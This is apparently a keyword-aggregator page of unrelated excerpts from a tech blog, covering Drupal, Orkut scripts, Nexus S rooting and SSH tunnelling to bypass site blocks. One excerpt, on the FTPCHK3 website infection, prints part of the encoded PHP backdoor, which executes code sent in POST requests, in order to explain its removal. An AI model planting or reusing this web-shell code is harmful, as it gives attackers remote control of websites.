03 Jan, 2011

New svchost.exe removal tool

Articles related to new svchost.exe removal tool

FTPCHK3 : Virus that adds malicious scripts to your website.

http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html 0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGIwc3JsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdiMHNyMicpKSE9J2Iwc3IyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>The code adds scripts to your code likeand executes codes coming via POST requests.Removal Backup your web directory, just in case something gets messed up.The following scripts scans files and removes most of the infection. I have written it to remove infected files from college website and it worked fine. Paste the following code in your web directory and execute. It renames infected files with file.infected and removes code from the file and updates your file to remove the code ...
Published 2 years, 3 months ago

Detect in form_alter if the node submitted is added or edited

http://digitalpbk.com/drupal/detect-drupal-form-add-edit-created-formalter Detect in form_alter if the node submitted is added or edited When you want to alter a form on Drupal, it is useful to detect if the form being submitted is to add a new node or edit an existing node. To detect if a form is being added or submitted, check the $form[]['nid']['#value']. Example : $form['book']['nid']['#value']. If the value is "new", the node is being added. If the value is numeric, the node with nid as the number is being ...
Published 2 years, 1 month ago

How to easily unlock and root the Samsung Google Nexus S on Windows

http://digitalpbk.com/nexus-s/how-to-root-nexus-s-windows How to easily unlock and root the Samsung Google Nexus S on Windows unusable (bricked) are rare, however in such an event I cannot be held responsible, Proceed at your own risk. Prerequisites Download the required files nexus-s-root.zip (19.1 MB). That's it no other downloads. Unzip them to a folder (Use Extract here, folder is created inside the zip) for ease of explanation I would suggest C: on Windows so that the folder nexus-s-root folder is in C:nexus-s-root. The zip contains the following: drivers: contains the nexus s bootloader drivers. tools: Necessary ...
Published 2 months, 4 weeks ago

Orkut : Community Polls

http://digitalpbk.blogspot.com/2007/03/orkut-community-polls_27.html Orkut : Community Polls Orkut introduces a new feature for communitiesCommunity PollsYou can post a question and a number of choices and run a poll in the community. I think the feature is now available only to a limited set of communities.Howzzat? ...
Published 4 years, 10 months ago

Orkut Perl Script - Login, Scrapper and more

http://digitalpbk.blogspot.com/2007/06/orkut-mass-scrapper-scrap-all-friends.html ("%45s","Command Line Orkut\n");printf ("%50s","By http://digitalpbk.blogspot.com\n");#inits$cj=HTTP::Cookies->new(file => "cookie.jar",autosave=>1,ignore_discard=>1);$mech = WWW::Mechanize->new(cookie_jar => $cj);@prc = ("\n","[FAILED]","[ OK ]\n");#main loopprint_c;while(){ chomp; @args = split(/ /); if(@args) { exit 0 if($args[0] eq "exit" || $args[0] eq "q"); if($args[0] eq "login") {login ...
Published 4 years, 7 months ago

SSH Tunneling Proxy using Putty on Windows and Linux (Unblock YouTube / Orkut / Facebook)

http://digitalpbk.blogspot.com/2009/05/ssh-proxy-windows-linux-orkut-bypass.html . Next we have to configure the Browser to use this proxy. On Linux (Or Cygwin on Windows)Run the commandssh -C2qTnN -D 9090 username@remote_machine.comSetting up the BrowserFirefoxOn linux take Edit > PreferencesOn Windows take Tools > OptionsClick on Advanced > Network Tab > Settings. (Illustrated Above)Now you get a window as shown below, and fill the settings as shown below.Manual Proxy SettingsBlank out all other Text FieldsSocks Host: localhostPort : 9090 (or the one you specified ...
Published 2 years, 8 months ago

Special characters for orkut

http://digitalpbk.blogspot.com/2006/12/special-characters-for-orkut.html Special characters for orkut Recently analyzing the traffic to my site I found that some wanted to know how to insert special characters in Orkut, yeah the fancy one's... So here is the info for them ... Method 1If you are on windows, take the character map from Start Menu > Programs > Accessories > System tools > Character Map. You will find all the special characters you need in there. Double clicking a character adds it to the text box below and when you have made your ...
Published 5 years, 1 month ago

e-Mail structure and Mail Dir File format

http://digitalpbk.blogspot.com/2007/07/e-mail-structure-mail-dir-file-format.html e-Mail structure and Mail Dir File format The MAIL Dir FormatMAIL Directory format is a format followed to store emails as files.The Mail Dir format has 3 directories newcurtmpThe new directory contains all the new mails, ie unread mails. The cur directory contains all the read mails.The tmp directory is a temporary directory used to store mails that are being received. When a mail is read it is moved from new to cur.All the emails are stored in files with a unique name (usually the message id ...
Published 4 years, 7 months ago

Happy Birthday digitalpbk.blogspot.com

http://digitalpbk.blogspot.com/2009/11/happy-birthday-digitalpbkblogspotcom.html Happy Birthday digitalpbk.blogspot.com Well I totally forgot that my blog is completed 3 years as of November 18. And you can see the numbers right :) I have started a new blog with more features so that people would get more information out of it and structured neatly.So @ 3 years of my Tech blogging on blogspot, i'm moving onto my domain. digitalpbk.comThis blog would still be here. So See Ya...digitalpbk:) ...
Published 2 years, 2 months ago

Google Go HelloWorld Example Program

http://digitalpbk.com/google-go/helloworld-example-program Google Go HelloWorld Example Program Go is a new language from Google, and here is the first step to learn it: Google Go Hello World File : hello.go package main import "fmt" func main() { fmt.Printf("Hello World !!! \n") } Compiling & Running 8g hello.go 8l hello.8 ./8.out Output Hello World !!! (Obviously :D ) Google Software ...
Published 2 years, 2 months ago

Related help topics for new svchost.exe removal tool More keywords like new svchost.exe removal tool
More pages for new svchost.exe removal tool


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Radha Nagar Beach Radha Nagar Beach in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk